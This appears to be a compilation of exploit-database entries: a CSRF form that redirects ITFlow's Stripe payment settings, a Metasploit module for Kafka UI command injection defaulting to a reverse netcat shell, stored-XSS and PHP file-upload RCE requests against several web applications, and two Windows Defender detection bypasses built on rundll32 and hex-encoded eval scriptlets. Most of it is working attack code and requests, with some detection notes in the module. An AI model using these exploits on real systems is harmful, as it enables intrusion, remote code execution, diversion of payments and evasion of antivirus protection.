<pre><code># CVE: CVE-2024-25344<br /># CWE: CWE-352<br /># Vendor: ITFlow.org<br /># Affected product: ITFlow - Before commit 432488eca3998c5be6b6b9e8f8ba01f54bc12378<br /># Discoverer: stehled, WP-Pomoc.cz<br /># Attack-Type: Remote<br /># AV: An admin user has to open a page provided by an attacker, which then performs a malicious request that changes system settings.<br /><br />Open source ITFlow was vulnerable to CSRF prior to commit 432488eca3998c5be6b6b9e8f8ba01f54bc12378<br />This vulnerability allowed an attacker to change system settings such as online payment information and Microsoft Azure SSO credentials.<br /><br />If an admin user is logged in, the provided PoC can redirect them to the post.php endpoint and make changes to the system. The PoC below changes Stripe-related settings, which would lead to the attacker receiving payments made through the system.<br /><br /><html><br /><form enctype="multipart/form-data" method="POST" action="https://demo.itflow.org/post.php"><br /> <table><br /> <tr><td>edit_online_payment_settings</td><td><input type="text" value="" name="edit_online_payment_settings"></td></tr><br /> <tr><td>config_stripe_enable</td><td><input type="text" value="1" name="config_stripe_enable"></td></tr><br /> <tr><td>config_stripe_publishable</td><td><input type="text" value="csrf-poc" name="config_stripe_publishable"></td></tr><br /> <tr><td>config_stripe_secret</td><td><input type="text" value="csrf-poc-secret" name="config_stripe_secret"></td></tr><br /> <tr><td>config_stripe_account</td><td><input type="text" value="1" name="config_stripe_account"></td></tr><br /> </table><br /> <input type="submit" value="https://demo.itflow.org/post.php"><br /></form><br /></html><br /><br /># Reference<br />https://itflow.org/<br />https://github.com/itflow-org/itflow/commit/432488eca3998c5be6b6b9e8f8ba01f54bc12378<br />https://github.com/itflow-org/itflow/commit/8068cb6081e4760860a634c1066b2c64d0ee2d46<br /></code></pre>
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2023-52251 (Kafka UI, Groovy message-filter command injection).
#
# Request sequence the module emits, in order — useful as a detection baseline
# when reviewing Kafka UI access logs (no credentials are sent with any of them):
#   GET    <base>/actuator/info                                   (vuln_version?)
#   GET    <base>/api/clusters                                    (get_cluster)
#   POST   <base>/api/clusters/<cluster>/topics                   (create_topic, random 4-10 char name)
#   POST   <base>/api/clusters/<cluster>/topics/<topic>/messages  (produce_message)
#   GET    <base>/api/clusters/<cluster>/topics/<topic>/messages?filterQueryType=GROOVY_SCRIPT&q=...  (execute_command)
#   DELETE <base>/api/clusters/<cluster>/topics/<topic>           (delete_topic, cleanup)
# 'Notes' below declares IOC_IN_LOGS and ARTIFACTS_ON_DISK accordingly.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata. Note that the top-level 'Arch' lists ARCH_X64/ARCH_X86 as well,
  # but the single target defined here only uses ARCH_CMD (:unix_cmd).
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.',
        'Description' => %q{
          A command injection vulnerability exists in Kafka ui between `v0.4.0` and `v0.7.1` allowing
          an attacker to inject and execute arbitrary shell commands via the `groovy` filter parameter
          at the `topic` section.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
          'BobTheShopLifter and Thingstad', # Discovery of the vulnerability CVE-2023-52251
        ],
        'References' => [
          ['CVE', '2023-52251'],
          ['URL', 'https://attackerkb.com/topics/ATJ1hTVB8H/cve-2023-52251'],
          ['URL', 'https://github.com/BobTheShoplifter/CVE-2023-52251-POC']
        ],
        'DisclosureDate' => '2023-09-27',
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
        'Privileged' => false,
        'Targets' => [
          [
            'Unix/Linux Command',
            {
              'Platform' => ['unix', 'linux'],
              'Arch' => [ARCH_CMD],
              'Type' => :unix_cmd,
              'Payload' => {
                'Encoder' => 'cmd/base64',
                'BadChars' => "\x00"
              },
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_netcat'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 8080,
          'SSL' => false
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
  end

  # Version gate used by the AutoCheck mixin and by #check.
  #
  # Reads the Spring Boot actuator info endpoint and fills @version from either
  # build.version (leading 'v' stripped) or, when only git.commit.id is exposed,
  # by matching the first 7 characters of each tag's commit sha listed in
  # data/kafka_ui_versions.json against that id.
  #
  # @return [Boolean] true only when @version matches /\d\.\d\.\d/ and lies
  #   within 0.4.0..0.7.1 inclusive; false on a failed request, an empty/unknown
  #   body, or an unmatched commit id (@version is then left as '').
  #   NOTE(review): the regex is unanchored and accepts only single-digit
  #   components, so e.g. '0.10.0' never reaches the range comparison.
  def vuln_version?
    @version = ''
    res = send_request_cgi({
      'method' => 'GET',
      'ctype' => 'application/json',
      'uri' => normalize_uri(target_uri.path, 'actuator', 'info')
    })
    if res && res.code == 200 && (res.body.include?('build') || res.body.include?('git'))
      res_json = res.get_json_document
      unless res_json.blank?
        if res.body.include?('build')
          @version = res_json['build']['version'].delete_prefix('v') # remove v from vx.x.x
        elsif res.body.include?('git')
          # use case where only the git commit id gets returned without the version information
          # determine version using the git commit id to match the first 7 chars of the sha commit stored in data/kafka_ui_versions.json file.
          git_commit_id = res_json['git']['commit']['id']
          kafka_ui_versions_json = JSON.parse(File.read(::File.join(Msf::Config.data_directory, 'kafka_ui_versions.json'), mode: 'rb'))
          unless kafka_ui_versions_json.blank?
            # loop thru the list of commits and set the version on a match of the first 7 chars of the sha commit; otherwise @version stays ''
            kafka_ui_versions_json.each do |tag|
              if tag['commit']['sha'][0, 7] == git_commit_id
                @version = tag['name'].delete_prefix('v')
                break
              end
            end
          end
        end
      end
      return Rex::Version.new(@version) <= Rex::Version.new('0.7.1') && Rex::Version.new(@version) >= Rex::Version.new('0.4.0') if @version.match(/\d\.\d\.\d/)
    end
    false
  end

  # Returns the name of the first cluster listed by GET /api/clusters whose
  # status is 'online' OR whose topicCount is greater than 0.
  #
  # NOTE(review): the inline comment below reads as if both conditions were
  # required, but the expression uses ||, so an online cluster with zero topics
  # (or an offline one with topics) also qualifies.
  #
  # @return [String, nil] the cluster name, or nil when the request fails,
  #   the body lacks 'status', or no cluster matches
  def get_cluster
    res = send_request_cgi({
      'method' => 'GET',
      'ctype' => 'application/json',
      'uri' => normalize_uri(target_uri.path, 'api', 'clusters')
    })
    if res && res.code == 200 && res.body.include?('status')
      res_json = res.get_json_document
      unless res_json.blank?
        # loop thru list of clusters and return an active cluster with topic count > 0 else return nil
        res_json.each do |cluster|
          if cluster['status'] == 'online' || cluster['topicCount'] > 0
            return cluster['name']
          end
        end
      end
    end
    nil
  end

  # Creates a throw-away topic (1 partition, replication factor 1,
  # cleanup.policy=delete, retention.bytes=-1) with a random 4..10 character
  # alphanumeric name. This is the on-disk artifact declared in 'Notes'; it
  # persists on the broker until #delete_topic succeeds.
  #
  # @param cluster [String] cluster name as returned by #get_cluster
  # @return [String, nil] the topic name echoed back in the JSON response,
  #   or nil when the request fails or the body does not contain the name
  def create_topic(cluster)
    topic_name = Rex::Text.rand_text_alphanumeric(4..10)
    post_data = {
      name: topic_name.to_s,
      partitions: 1,
      replicationFactor: 1,
      configs:
      {
        'cleanup.policy': 'delete',
        'retention.bytes': '-1'
      }
    }.to_json
    res = send_request_cgi({
      'method' => 'POST',
      'ctype' => 'application/json',
      'uri' => normalize_uri(target_uri.path, 'api', 'clusters', cluster.to_s, 'topics'),
      'data' => post_data.to_s
    })
    if res && res.code == 200 && res.body.include?(topic_name.to_s)
      res_json = res.get_json_document
      unless res_json.blank?
        return res_json['name']
      end
    end
    nil
  end

  # Deletes the topic created by #create_topic.
  #
  # @param cluster [String] cluster name
  # @param topic [String] topic name
  # @return [Boolean] true only on an HTTP 200 response
  def delete_topic(cluster, topic)
    res = send_request_cgi({
      'method' => 'DELETE',
      'ctype' => 'application/json',
      'uri' => normalize_uri(target_uri.path, 'api', 'clusters', cluster.to_s, 'topics', topic.to_s)
    })
    return true if res && res.code == 200

    false
  end

  # Publishes a single placeholder message (key and content are the literal
  # string 'null', String serdes, partition 0) into the topic so that the
  # Groovy-filtered read in #execute_command has a record to evaluate.
  #
  # @param cluster [String] cluster name
  # @param topic [String] topic name
  # @return [Boolean] true only on an HTTP 200 response
  def produce_message(cluster, topic)
    # Create a dummy message to trigger the groovy script execution
    post_data = {
      partition: 0,
      key: 'null',
      content: 'null',
      keySerde: 'String',
      valueSerde: 'String'
    }.to_json
    res = send_request_cgi({
      'method' => 'POST',
      'ctype' => 'application/json',
      'uri' => normalize_uri(target_uri.path, 'api', 'clusters', cluster.to_s, 'topics', topic.to_s, 'messages'),
      'data' => post_data.to_s
    })
    return true if res && res.code == 200

    false
  end

  # Sends the command to the target by embedding it in a Groovy snippet passed
  # as the `q` parameter of a message read with filterQueryType=GROOVY_SCRIPT.
  # Reads @cluster and @new_topic, which #exploit sets beforehand.
  #
  # Detection: the corresponding access-log entry is a GET on
  # .../topics/<topic>/messages whose query string carries
  # filterQueryType=GROOVY_SCRIPT together with a `q` value containing
  # ProcessBuilder — neither occurs during normal UI message browsing with
  # the default (non-Groovy) filter, so that pair is a high-signal indicator.
  #
  # @param cmd [String] shell command; interpolated into the Groovy string without escaping
  # @param _opts [Hash] unused (presumably present to match the CmdStager execute_command signature)
  # @return whatever send_request_cgi returns (the raw response, or nil on connection failure)
  def execute_command(cmd, _opts = {})
    payload = "Process p=new ProcessBuilder(\"sh\",\"-c\",\"#{cmd}\").redirectErrorStream(true).start()"
    return send_request_cgi({
      'method' => 'GET',
      'ctype' => 'application/x-www-form-urlencoded',
      'uri' => normalize_uri(target_uri.path, 'api', 'clusters', @cluster.to_s, 'topics', @new_topic.to_s, 'messages'),
      'vars_get' => {
        'q' => payload.to_s,
        'filterQueryType' => 'GROOVY_SCRIPT',
        'attempt' => 2,
        'limit' => 100,
        'page' => 0,
        'seekDirection' => 'FORWARD',
        'keySerde' => 'String',
        'valueSerde' => 'String',
        'seekType' => 'BEGINNING'
      }
    })
  end

  # Vulnerability check driven entirely by #vuln_version?, which also populates @version.
  #
  # @return [Msf::Exploit::CheckCode]
  #   Appears  - version parsed and within 0.4.0..0.7.1
  #   Safe     - version parsed (matches /\d\.\d\.\d/) but outside that range, or no version found
  #   Detected - a non-empty @version that does not look like x.y.z
  def check
    vprint_status("Checking if #{peer} can be exploited.")
    return CheckCode::Appears("Kafka-ui version: #{@version}") if vuln_version?

    unless @version.blank?
      if @version.match(/\d\.\d\.\d/)
        return CheckCode::Safe("Kafka-ui version: #{@version}")
      else
        return CheckCode::Detected("Kafka-ui unknown version: #{@version}")
      end
    end
    CheckCode::Safe
  end

  # Exploit flow: pick a cluster, create a topic, publish one message, issue the
  # Groovy-filtered read with the encoded payload, then delete the topic.
  # Each preparatory step aborts via fail_with; the cleanup step only logs on failure,
  # so a leftover topic on the broker is possible and is reported as requiring manual removal.
  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    vprint_status('Searching for active Kafka cluster...')
    @cluster = get_cluster
    fail_with(Failure::NotFound, 'Could not find or connect to an active Kafka cluster.') if @cluster.nil?
    vprint_good("Active Kafka cluster found: #{@cluster}")

    vprint_status('Creating a new topic...')
    @new_topic = create_topic(@cluster)
    fail_with(Failure::Unknown, 'Could not create a new topic.') if @new_topic.nil?
    vprint_good("New topic created: #{@new_topic}")

    vprint_status('Trigger Groovy script payload execution by creating a message...')
    fail_with(Failure::PayloadFailed, 'Could not trigger the Groovy script payload execution.') unless produce_message(@cluster, @new_topic)

    # Only the :unix_cmd target exists; the response of execute_command is not inspected.
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    end

    # cleaning up the mess and remove new created topic
    vprint_status('Removing tracks...')
    if delete_topic(@cluster, @new_topic)
      vprint_good("Successfully deleted topic #{@new_topic}.")
    else
      print_error("Could not delete topic #{@new_topic}. Manually cleaning required.")
    end
  end
end
<pre><code># Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site Scripting<br /># Date: 2024-01-03<br /># Exploit Author: Eren Sen<br /># Vendor: SAVSOFT QUIZ<br /># Vendor Homepage: https://savsoftquiz.com<br /># Software Link: https://savsoftquiz.com/web/index.php/online-demo/<br /># Version: < 6.0<br /># CVE-ID: N/A<br /># Tested on: Kali Linux / Windows 10<br /># Vulnerabilities Discovered Date : 2024/01/03<br /><br /># Persistent Cross Site Scripting (XSS) Vulnerability<br /># Vulnerable Parameter Type: POST<br /># Vulnerable Parameter: quiz_name<br /><br /># Proof of Concepts:<br /><br />https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13<br /><br /># HTTP Request:<br /><br />POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/ HTTP/1.1<br />Host: demos1.softaculous.com<br />Cookie: ci_session=xxxxxxxxxxxxxxxxxxxxxxxxx<br />Content-Length: 411<br />Cache-Control: max-age=0<br />Sec-Ch-Ua:<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: https://demos1.softaculous.com<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/add_new<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br 
/>quiz_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=%3Cp%3Etest%3C%2Fp%3E&start_date=2024-01-04+01%3A00%3A27&end_date=2025-01-03+01%3A00%3A27&duration=10&maximum_attempts=10&pass_percentage=50&correct_score=1&incorrect_score=0&ip_address=&view_answer=1&with_login=1&show_chart_rank=1&camera_req=0&gids%5B%5D=1&quiz_template=Default&question_selection=0&quiz_price=0&gen_certificate=0&certificate_text=<br /></code></pre>
<pre><code># Exploit Title: SPA-CART CMS - Stored XSS<br /># Date: 2024-01-03<br /># Exploit Author: Eren Sen<br /># Vendor: SPA-Cart<br /># Vendor Homepage: https://spa-cart.com/<br /># Software Link: https://demo.spa-cart.com/<br /># Version: [1.9.0.3]<br /># CVE-ID: N/A<br /># Tested on: Kali Linux / Windows 10<br /># Vulnerabilities Discovered Date : 2024/01/03<br /><br /># Vulnerability Type: Stored Cross Site Scripting (XSS) Vulnerability<br /># Vulnerable Parameter Type: POST<br /># Vulnerable Parameter: descr<br /><br /># Proof of Concept: demo.spa-cart.com/product/258<br /><br /># HTTP Request:<br /><br />POST ////admin/products/258 HTTP/2<br />Host: demo.spa-cart.com<br />Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx; remember=xxxxxxxxxxxxxxxx<br />Content-Length: 1906<br />Sec-Ch-Ua:<br />Accept: */*<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36<br />Sec-Ch-Ua-Platform: ""<br />Origin: https://demo.spa-cart.com<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://demo.spa-cart.com////admin/products/258<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="mode"<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="sku"<br /><br />SKU386<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="name"<br /><br />asdf<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="cleanurl"<br /><br />Wholesale-DIY-Jewelry-Faceted-70pcs-6-8mm-Red-AB-Rondelle-glass-Crystal-Beads<br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: 
form-data; name="avail"<br /><br />1000<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="price"<br /><br />0.00<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="list_price"<br /><br />2<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="weight"<br /><br />0.00<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="categoryid"<br /><br />42<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="categories[]"<br /><br />8<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="categories[]"<br /><br />37<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="brandid"<br /><br />4<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="status"<br /><br /><br />1<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="keywords"<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br /><br />Content-Disposition: form-data; name="descr"<br /><br /><script>alert(1)</script><br /><br /><br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="title_tag"<br /><br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="meta_keywords"<br /><br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="meta_description"<br /><br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl--<br /></code></pre>
<pre><code># Exploit Title: Petrol pump management software - File Upload Remote Code Execution (RCE) (unauthenticated)<br /># Google Dork: N/A<br /># Application: Petrol pump management software<br /># Date: 20.02.2024<br /># Bugs: File Upload Remote Code Execution (RCE) (unauthenticated)<br /># Exploit Author: SoSPiro<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html<br /># Version: 1.0<br /># Tested on: Windows 10 64 bit Wampserver <br /># CVE : N/A<br /><br />## Vulnerability Description:<br /><br />Due to a security vulnerability in "fuelflow/admin/app/web_crud.php," unauthenticated users can upload <br />files using the "POST" method. The uploaded files are stored in the "/fuelflow/assets/images" folder. <br />This allows malicious individuals to execute unauthorized commands on the system.<br /><br /><br />## Status: HIGH-CRITICAL Vulnerability<br /><br /><br />## Proof of Concept (PoC):<br /><br />Video:<br />https://drive.google.com/file/d/1_jue-UhpASC_XxcUWU-QhMYDrSIehnWx/view<br /><br /><br /><br />// File upload request<br /><br /><br />POST /zerday/fuelflow/admin/app/web_crud.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: multipart/form-data; boundary=---------------------------82750242321210078514140255085<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/zer/fuelflow/admin/web.php<br />Cookie: PHPSESSID=1<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />-----------------------------82750242321210078514140255085<br 
/>Content-Disposition: form-data; name="id"<br /><br />1<br />-----------------------------82750242321210078514140255085<br />Content-Disposition: form-data; name="old_photo1_img"<br /><br />test.png<br />-----------------------------82750242321210078514140255085<br />Content-Disposition: form-data; name="photo1"; filename="3.php"<br />Content-Type: image/png<br /><br /><?php phpinfo();?><br />-----------------------------82750242321210078514140255085<br />Content-Disposition: form-data; name="title"<br /><br />FuelFlow lite - Developed by Mayuri K. tessss<br />-----------------------------82750242321210078514140255085<br />Content-Disposition: form-data; name="old_photos_img"<br /><br />test.png<br />-----------------------------82750242321210078514140255085<br />Content-Disposition: form-data; name="photos"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------82750242321210078514140255085<br />Content-Disposition: form-data; name="sitekey"<br /><br />test<br />-----------------------------82750242321210078514140255085<br />Content-Disposition: form-data; name="secretkey"<br /><br />test<br />-----------------------------82750242321210078514140255085<br />Content-Disposition: form-data; name="update"<br /><br /><br />-----------------------------82750242321210078514140255085--<br /><br /><br /><br /><br /><br /><br />// Phpinfo file location <br /><br />/zerday/fuelflow/assets/images/65d45a6080eca.php<br /></code></pre>
<pre><code># Exploit Title: Tourism Management System v2.0 - Arbitrary File Upload<br /># Google Dork: N/A<br /># Exploit Author: SoSPiro<br /># Date: 2024-02-18<br /># Vendor Homepage: https://phpgurukul.com<br /># Software Link: https://phpgurukul.com/tourism-management-system-free-download/<br /># Version: 2.0<br /># Tested on: Windows 10 Pro<br /># Impact: Allows an admin to upload arbitrary files to the web server<br /># CVE : N/A<br /><br /><br /># Exploit Description:<br />The application is prone to an arbitrary file-upload vulnerability because it fails to adequately sanitize user-supplied input.<br /><br /># PoC request<br /><br /><br />POST /zer/tms/admin/change-image.php?imgid=1 HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: multipart/form-data; boundary=---------------------------390927495111779706051786831201<br />Content-Length: 361<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/zer/tms/admin/change-image.php?imgid=1<br />Cookie: PHPSESSID=eqms3ipedmm41hqa1djnu1euhv<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />X-PwnFox-Color: red<br /><br />-----------------------------390927495111779706051786831201<br />Content-Disposition: form-data; name="packageimage"; filename="phpinfo.php"<br />Content-Type: text/plain<br /><br /><?php phpinfo();?><br />-----------------------------390927495111779706051786831201<br />Content-Disposition: form-data; name="submit"<br /><br /><br />-----------------------------390927495111779706051786831201--<br /><br /><br /><br /><br />===========================================================================================<br /><br 
/>- Response -<br /><br />HTTP/1.1 200 OK<br />Date: Sun, 18 Feb 2024 04:33:37 GMT<br />Server: Apache/2.4.54 (Win64) PHP/8.1.13 mod_fcgid/2.3.10-dev<br />X-Powered-By: PHP/8.1.13<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 8146<br /><br />============================================================================================<br /><br />- File location -<br /><br />http://localhost/zer/tms/admin/pacakgeimages/phpinfo.php<br /></code></pre>
<pre><code>[+] Credits: John Page (aka hyp3rlinx) <br />[+] Website: hyp3rlinx.altervista.org<br />[+] Source: https://hyp3rlinx.altervista.org/advisories/Windows_Defender_Backdoor_JS.Relvelshe.A_Detection_Mitigation_Bypass.txt<br />[+] twitter.com/hyp3rlinx<br />[+] ISR: ApparitionSec <br /> <br /><br /><br />[Vendor]<br />www.microsoft.com<br /><br /><br />[Product]<br />Windows Defender<br /><br /><br />[Vulnerability Type]<br />Detection Mitigation Bypass <br />Backdoor:JS/Relvelshe.A<br /><br /><br />[CVE Reference]<br />N/A<br /><br /><br />[Security Issue]<br />Back in 2022 I released a PoC to bypass the Backdoor:JS/Relvelshe.A detection in defender but it no longer works as was mitigated.<br />However, adding a simple javascript try catch error statement and eval the hex string it executes as of the time of this post.<br /><br /><br />[References]<br />https://twitter.com/hyp3rlinx/status/1480657623947091968<br /><br /><br />[Exploit/POC]<br />1) python -m http.server 80<br /><br />2) Open command prompt as Administrator<br /><br />3) rundll32 javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://localhost/yo.tmp")<br /><br />Create file and host on server, this is contents of the "yo.tmp" file.<br /><br /><?xml version="1.0"?><br /><component><br /><script><br />try{<br /><![CDATA[<br />var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";<br />var str = '';<br />for (var n = 0; n < hex.length; n += 2) {<br />str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));<br />}<br />eval(str)<br />]]><br />}catch(e){<br />eval(str)<br />}<br /></script><br /></component><br /><br /><br />[Network Access]<br />Local<br /><br /><br /><br />[Severity]<br />High<br /><br /><br />[Disclosure Timeline]<br />Vendor Notification: <br />February 18, 2024: Public Disclosure<br /><br /><br /><br />[+] Disclaimer<br />The information 
contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.<br />Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and<br />that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit<br />is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility<br />for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information<br />or exploits by the author or elsewhere. All content (c).<br /><br />hyp3rlinx<br /></code></pre>
<pre><code>[+] Credits: John Page (aka hyp3rlinx) <br />[+] Website: hyp3rlinx.altervista.org<br />[+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_VBSCRIPT_TROJAN_MITIGATION_BYPASS.txt<br />[+] twitter.com/hyp3rlinx<br />[+] ISR: ApparitionSec <br /> <br /><br />[Vendor]<br />www.microsoft.com<br /><br /><br />[Product]<br />Windows Defender<br /><br /><br />[Vulnerability Type]<br />Windows Defender VBScript Detection Mitigation Bypass<br />TrojanWin32Powessere.G<br /><br /><br />[CVE Reference]<br />N/A<br /><br /><br />[Security Issue]<br />Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail<br />and attackers will typically get an "Access is denied" error message. Previously I have disclosed 3 bypasses using rundll32 javascript, this example leverages VBSCRIPT and ActiveX engine.<br /><br />Running rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0), will typically get blocked by Windows Defender with<br />an "Access is denied" message.<br /><br />Trojan:Win32/Powessere.G<br />Category: Trojan<br />This program is dangerous and executes commands from an attacker.<br /><br />However, you can add arbitrary text for the 2nd mshtml parameter to build off my previous javascript based bypasses to skirt defender detection.<br />Example, adding "shtml", "Lol" or other text and it will execute as of the time of this writing.<br /><br />E.g.<br /><br />C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\PWN\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)<br /><br /><br />[References]<br />https://twitter.com/hyp3rlinx/status/1759260962761150468<br />https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt<br 
/>https://lolbas-project.github.io/lolbas/Binaries/Rundll32/<br /><br /><br />[Exploit/POC]<br />Open command prompt as Administrator<br /><br />C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)<br />Access is denied.<br /><br />C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)<br /><br />We win!<br /><br />[Network Access]<br />Local<br /><br /><br />[Severity]<br />High<br /><br /><br />[Disclosure Timeline]<br />Vendor Notification: <br />February 18, 2024 : Public Disclosure<br /><br /><br /><br />[+] Disclaimer<br />The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.<br />Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and<br />that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit<br />is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility<br />for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information<br />or exploits by the author or elsewhere. All content (c).<br /><br />hyp3rlinx<br /></code></pre>
